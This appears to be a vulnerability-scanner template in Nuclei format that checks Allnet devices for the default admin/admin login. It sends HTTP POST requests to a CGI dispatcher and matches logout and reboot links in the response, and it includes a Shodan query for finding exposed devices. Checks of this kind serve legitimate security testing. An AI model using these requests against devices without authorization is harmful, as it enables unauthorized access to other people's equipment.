漏洞描述
Allnet contains a default login vulnerability. Default admin login password 'admin' was found.
id: allnet-default-login
info:
name: Allnet - Default Login
author: ritikchaddha
severity: high
description: |
Allnet contains a default login vulnerability. Default admin login password 'admin' was found.
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:-121681558
tags: default-login,allnet,vuln
http:
- raw:
- |
POST /cgi-bin/dispatcher.cgi?cmd=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&login=1
- |
POST /cgi-bin/dispatcher.cgi?cmd=3 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&login=1
stop-at-first-match: true
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '>LOGOUT</a>'
- 'REBOOT</a>'
condition: and
- type: status
status:
- 200
# digest: 490a00463044022025bcd348ea4055d981dafc0c14e3b965c1acaa75b2f6ec6ac360bebb20c338ad022078b1e61c59914fe2d29c6ccf41e85af4f5e06bbfe8557462fbdeec8fc42e80b9:922c64590222798bb761d5b6d8e72950